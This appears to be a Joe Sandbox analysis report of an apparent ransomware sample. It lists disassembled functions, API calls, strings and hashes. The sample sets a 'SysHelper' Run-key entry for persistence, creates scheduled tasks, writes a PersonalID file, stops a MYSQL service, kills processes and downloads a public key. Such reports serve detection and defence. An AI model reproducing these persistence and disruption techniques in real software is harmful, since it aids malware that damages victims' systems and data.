                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                • String ID:
                • API String ID: 1503006713-0
                • Opcode ID: 782461e458cf13f7b69974c70a27adc99d6df7de0ead0becf0edf776f9ba6d56
                • Instruction ID: 8b5b6749b4f509f283f4592c8036b9fc340ac08d61b50d13b2524a40b9fdfb6a
                • Opcode Fuzzy Hash: 782461e458cf13f7b69974c70a27adc99d6df7de0ead0becf0edf776f9ba6d56
                • Instruction Fuzzy Hash: 7E21B331705A21ABE7217F66B802E1F7FE4DF41728BD0442FF44459192EA39A800CA5D
                APIs
                • PostQuitMessage.USER32(00000000), ref: 0041BB49
                • DefWindowProcW.USER32(?,?,?,?), ref: 0041BBBA
                • _malloc.LIBCMT ref: 0041BBE4
                • GetComputerNameW.KERNEL32(00000000,?), ref: 0041BBF4
                • _free.LIBCMT ref: 0041BCD7
                  • Part of subcall function 00411CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                  • Part of subcall function 00411CD0: _memset.LIBCMT ref: 00411D3B
                  • Part of subcall function 00411CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                  • Part of subcall function 00411CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                  • Part of subcall function 00411CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                  • Part of subcall function 00411CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                • IsWindow.USER32(?), ref: 0041BF69
                • DestroyWindow.USER32(?), ref: 0041BF7B
                • DefWindowProcW.USER32(?,00008003,?,?), ref: 0041BFA8
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                • String ID:
                • API String ID: 3873257347-0
                • Opcode ID: f729ec156da57fca7fee0a65632cfd00bd7f39968df2b9978418747e4f1c509a
                • Instruction ID: 866eb7db68ae170cd8e17be643faf7720e0ae735171854e0fa5cbc2bc792534d
                • Opcode Fuzzy Hash: f729ec156da57fca7fee0a65632cfd00bd7f39968df2b9978418747e4f1c509a
                • Instruction Fuzzy Hash: 85C19171508340AFDB20DF25DD45B9BBBE0FF85318F14492EF888863A1D7799885CB9A
                APIs
                • CoInitialize.OLE32(00000000), ref: 00411BB0
                • CoCreateInstance.OLE32(004CE908,00000000,00000001,004CD568,00000000), ref: 00411BC8
                • CoUninitialize.OLE32 ref: 00411BD0
                • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00411C12
                • SHGetPathFromIDListW.SHELL32(?,?), ref: 00411C22
                • lstrcatW.KERNEL32(?,00500050), ref: 00411C3A
                • lstrcatW.KERNEL32(?), ref: 00411C44
                • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00411C68
                • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00411C7A
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                • String ID: \shell32.dll
                • API String ID: 679253221-3783449302
                • Opcode ID: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                • Instruction ID: 1ac700bd2dba931ae0f93f3cd35093afe8c3aec66b03df765643047a9f16b657
                • Opcode Fuzzy Hash: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                • Instruction Fuzzy Hash: 1D415E70A40209AFDB10CBA4DC88FEA7B7CEF44705F104499F609D7160D6B4AA45CB54
                APIs
                • GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
                • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                • GetDesktopWindow.USER32 ref: 004549FB
                • GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                • GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                • _wcsstr.LIBCMT ref: 00454A8A
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                • String ID: Service-0x$_OPENSSL_isservice
                • API String ID: 2112994598-1672312481
                • Opcode ID: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
                • Instruction ID: a4b3c478c226dd270820e71b951499fe23bca8177d071b610c32d3665965eb2a
                • Opcode Fuzzy Hash: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
                • Instruction Fuzzy Hash: 04312831A401049BCB10DBBAEC46AAE7778DFC4325F10426BFC19D72E1EB349D148B58
                APIs
                • GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
                • GetFileType.KERNEL32(00000000,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454B05
                • __vfwprintf_p.LIBCMT ref: 00454B27
                  • Part of subcall function 0042BDCC: _vfprintf_helper.LIBCMT ref: 0042BDDF
                • vswprintf.LIBCMT ref: 00454B5D
                • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00454B7E
                • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00454BA2
                • DeregisterEventSource.ADVAPI32(00000000), ref: 00454BA9
                • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00454BD3
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                • String ID: OPENSSL$OpenSSL: FATAL
                • API String ID: 277090408-1348657634
                • Opcode ID: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
                • Instruction ID: 2d266f03b07cc91b1361f4b715b0612335af4cc100d4b249efeb6d9ab3704f8b
                • Opcode Fuzzy Hash: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
                • Instruction Fuzzy Hash: 74210D716443006BD770A761DC47FEF77D8EF94704F80482EF699861D1EAB89444875B
                APIs
                • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00412389
                • _memset.LIBCMT ref: 004123B6
                • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004123DE
                • RegCloseKey.ADVAPI32(?), ref: 004123E7
                • GetCommandLineW.KERNEL32 ref: 004123F4
                • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004123FF
                • lstrcpyW.KERNEL32(?,00000000), ref: 0041240E
                • lstrcmpW.KERNEL32(?,?), ref: 00412422
                Strings
                • SysHelper, xrefs: 004123D6
                • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0041237F
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                • API String ID: 122392481-4165002228
                • Opcode ID: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
                • Instruction ID: c603cf62551caa9c06587f3e6ced3ee16b2371f56cdaae2afb18e0be874d4686
                • Opcode Fuzzy Hash: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
                • Instruction Fuzzy Hash: D7112C7194020DABDF50DFA0DC89FEE77BCBB04705F0445A5F509E2151DBB45A889F94
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _memmove
                • String ID: invalid string position$string too long
                • API String ID: 4104443479-4289949731
                • Opcode ID: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
                • Instruction ID: bf4c3c4c16418921af35957e8a842e40232b78bc4dd53ff6fdc572851f10e90f
                • Opcode Fuzzy Hash: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
                • Instruction Fuzzy Hash: 4AC19F71700209EFDB18CF48C9819EE77A6EF85704B24492EE891CB741DB34ED968B99
                APIs
                • CoInitialize.OLE32(00000000), ref: 0040DAEB
                • CoCreateInstance.OLE32(004D4F6C,00000000,00000001,004D4F3C,?,?,004CA948,000000FF), ref: 0040DB0B
                • lstrcpyW.KERNEL32(?,?), ref: 0040DBD6
                • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,004CA948,000000FF), ref: 0040DBE3
                • _memset.LIBCMT ref: 0040DC38
                • CoUninitialize.OLE32 ref: 0040DC92
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                • String ID: --Task$Comment$Time Trigger Task
                • API String ID: 330603062-1376107329
                • Opcode ID: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
                • Instruction ID: 3ca8ca325a9fd4b6db29fab4a8cd6851ae340f1496bb62272076f21ffc706129
                • Opcode Fuzzy Hash: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
                • Instruction Fuzzy Hash: E051F670A40209AFDB00DF94CC99FAE7BB9FF88705F208469F505AB2A0DB75A945CF54
                APIs
                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00411A1D
                • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00411A32
                • ControlService.ADVAPI32(00000000,00000001,?), ref: 00411A46
                • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A5B
                • Sleep.KERNEL32(?), ref: 00411A75
                • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A80
                • CloseServiceHandle.ADVAPI32(00000000), ref: 00411A9E
                • CloseServiceHandle.ADVAPI32(00000000), ref: 00411AA1
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                • String ID: MYSQL
                • API String ID: 2359367111-1651825290
                • Opcode ID: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                • Instruction ID: 28721974f2ef8f77e49d09c1c1511d7c7b7ffc9f5d452c27f8aea73f5df61dea
                • Opcode Fuzzy Hash: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                • Instruction Fuzzy Hash: 7F117735A01209ABDB209BD59D88FEF7FACEF45791F040122FB08D2250D728D985CAA8
                APIs
                • std::exception::exception.LIBCMT ref: 0044F27F
                  • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                • __CxxThrowException@8.LIBCMT ref: 0044F294
                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                • std::exception::exception.LIBCMT ref: 0044F2AD
                • __CxxThrowException@8.LIBCMT ref: 0044F2C2
                • std::regex_error::regex_error.LIBCPMT ref: 0044F2D4
                  • Part of subcall function 0044EF74: std::exception::exception.LIBCMT ref: 0044EF8E
                • __CxxThrowException@8.LIBCMT ref: 0044F2E2
                • std::exception::exception.LIBCMT ref: 0044F2FB
                • __CxxThrowException@8.LIBCMT ref: 0044F310
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                • String ID: bad function call
                • API String ID: 2464034642-3612616537
                • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                • Instruction ID: b7a33952e270e61bb8336860f47bfa26d0287e47148adb1a9e07c7a629f44a3a
                • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                • Instruction Fuzzy Hash: 60110A74D0020DBBCB04FFA5D566CDDBB7CEA04348F408A67BD2497241EB78A7498B99
                APIs
                • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 004654C8
                • GetLastError.KERNEL32(?,?,00000000), ref: 004654D4
                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004654F7
                • GetLastError.KERNEL32(?,?,00000000), ref: 00465503
                • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00465531
                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 0046555B
                • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 004655F5
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide$ErrorLast
                • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                • API String ID: 1717984340-2085858615
                • Opcode ID: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
                • Instruction ID: 21cfcf061b86b0f752f7d9b12bec731e5652c25b667fcf3b1ac9b742683446ef
                • Opcode Fuzzy Hash: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
                • Instruction Fuzzy Hash: 5A518E71B40704BBEB206B61DC47FBF7769AF05715F40012BFD05BA2C1E669490186AB
                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
                • String ID:
                • API String ID: 790675137-0
                • Opcode ID: 2fe18499bb4b277bb903c4b639d215f295b25cf635af7c7ba5e987040424d360
                • Instruction ID: 0fe30f67420a0b57e0336c9221d2143c2ac41a82f10de3dc78134a272e9def7d
                • Opcode Fuzzy Hash: 2fe18499bb4b277bb903c4b639d215f295b25cf635af7c7ba5e987040424d360
                • Instruction Fuzzy Hash: BE412932700724AFDB11AFA6B886B9E7BE0EF44318F90802FF51496282DB7D9544DB1D
                APIs
                  • Part of subcall function 00420FDD: __wfsopen.LIBCMT ref: 00420FE8
                • _fgetws.LIBCMT ref: 0040C7BC
                • _memmove.LIBCMT ref: 0040C89F
                • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: CreateDirectory__wfsopen_fgetws_memmove
                • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                • API String ID: 2864494435-54166481
                • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                • Instruction ID: 3a80d152ee3a33a632d987be3a831cd6f981e29f6d1810208bb328cacc5ceb60
                • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                • Instruction Fuzzy Hash: 449193B2E00219DBCF20DFA5D9857AFB7B5AF04304F54463BE805B3281E7799A44CB99
                APIs
                • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041244F
                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412469
                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004124A1
                • TerminateProcess.KERNEL32(00000000,00000009), ref: 004124B0
                • CloseHandle.KERNEL32(00000000), ref: 004124B7
                • Process32NextW.KERNEL32(00000000,0000022C), ref: 004124C1
                • CloseHandle.KERNEL32(00000000), ref: 004124CD
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                • String ID: cmd.exe
                • API String ID: 2696918072-723907552
                • Opcode ID: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
                • Instruction ID: b239e8364e8e77cb7af63d5752a1eab109cf3eb7ce5fcb3b526656d556a9da04
                • Opcode Fuzzy Hash: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
                • Instruction Fuzzy Hash: ED0192355012157BE7206BA1AC89FAF766CEB08714F0400A2FD08D2141EA6489408EB9
                APIs
                • LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040F338
                • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040F353
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: SHGetFolderPathW$Shell32.dll$\
                • API String ID: 2574300362-2555811374
                • Opcode ID: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
                • Instruction ID: 879cb2c41796572bb27552663435674e3d239ec9c812fe4031d18dca963833e9
                • Opcode Fuzzy Hash: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
                • Instruction Fuzzy Hash: DFC15A70D00209EBDF10DFA4DD85BDEBBB5AF14308F10443AE405B7291EB79AA59CB99
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _malloc$__except_handler4_fprintf
                • String ID: &#160;$Error encrypting message: %s$\\n
                • API String ID: 1783060780-3771355929
                • Opcode ID: 779349bd5cffae9da37cda92e0556b786322a556b4ba80c6d8d46dbb3173291c
                • Instruction ID: bc568b6946d652cfd5b4c77746d66a5f57144f99ddafb1662d710ebef24806c3
                • Opcode Fuzzy Hash: 779349bd5cffae9da37cda92e0556b786322a556b4ba80c6d8d46dbb3173291c
                • Instruction Fuzzy Hash: 10A196B1C00249EBEF10EF95DD46BDEBB75AF10308F54052DE40576282D7BA5688CBAA
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _strncmp
                • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                • API String ID: 909875538-2908105608
                • Opcode ID: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                • Instruction ID: 5da15f4c8f0622be9955200bbf206a62195e74188b9aea783317ae4bc8ba6fc6
                • Opcode Fuzzy Hash: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                • Instruction Fuzzy Hash: B7413EA1BC83C129F721592ABC03F9763854B51B17F080467FA88E52C3FB9D8987419F
                APIs
                • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0040C6C2
                • RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
                • RegCloseKey.ADVAPI32(00000000), ref: 0040C700
                • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0040C725
                • RegCloseKey.ADVAPI32(00000000), ref: 0040C72E
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: CloseValue$OpenQuery
                • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                • API String ID: 3962714758-1667468722
                • Opcode ID: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                • Instruction ID: 83d53c3b81c5c3826f22504a9cab54a14a7287ca0244f3776693af22b4817dfa
                • Opcode Fuzzy Hash: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                • Instruction Fuzzy Hash: 60112D7594020CFBDB109F91CC86FEEBB78EB04708F2041A5FA04B22A1D7B55B14AB58
                APIs
                • _memset.LIBCMT ref: 0041E707
                  • Part of subcall function 0040C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
                • InternetOpenW.WININET ref: 0041E743
                • _wcsstr.LIBCMT ref: 0041E7AE
                • _memmove.LIBCMT ref: 0041E838
                • lstrcpyW.KERNEL32(?,?), ref: 0041E90A
                • lstrcatW.KERNEL32(?,&first=false), ref: 0041E93D
                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041E954
                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041E96F
                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E98C
                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041E9A3
                • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0041E9CD
                • InternetCloseHandle.WININET(00000000), ref: 0041E9F3
                • InternetCloseHandle.WININET(00000000), ref: 0041E9F6
                • _strstr.LIBCMT ref: 0041EA36
                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EA59
                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EA74
                • DeleteFileA.KERNEL32(?), ref: 0041EA82
                • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0041EA92
                • lstrcpyA.KERNEL32(?,?), ref: 0041EAA4
                • lstrcpyA.KERNEL32(?,?), ref: 0041EABA
                • lstrlenA.KERNEL32(?), ref: 0041EAC8
                • lstrlenA.KERNEL32(00000022), ref: 0041EAE3
                • lstrcpyW.KERNEL32(?,00000000), ref: 0041EB5B
                • lstrlenA.KERNEL32(?), ref: 0041EB7C
                • _malloc.LIBCMT ref: 0041EB86
                • _memset.LIBCMT ref: 0041EB94
                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0041EBAE
                • lstrcpyW.KERNEL32(?,00000000), ref: 0041EBB6
                • _strstr.LIBCMT ref: 0041EBDA
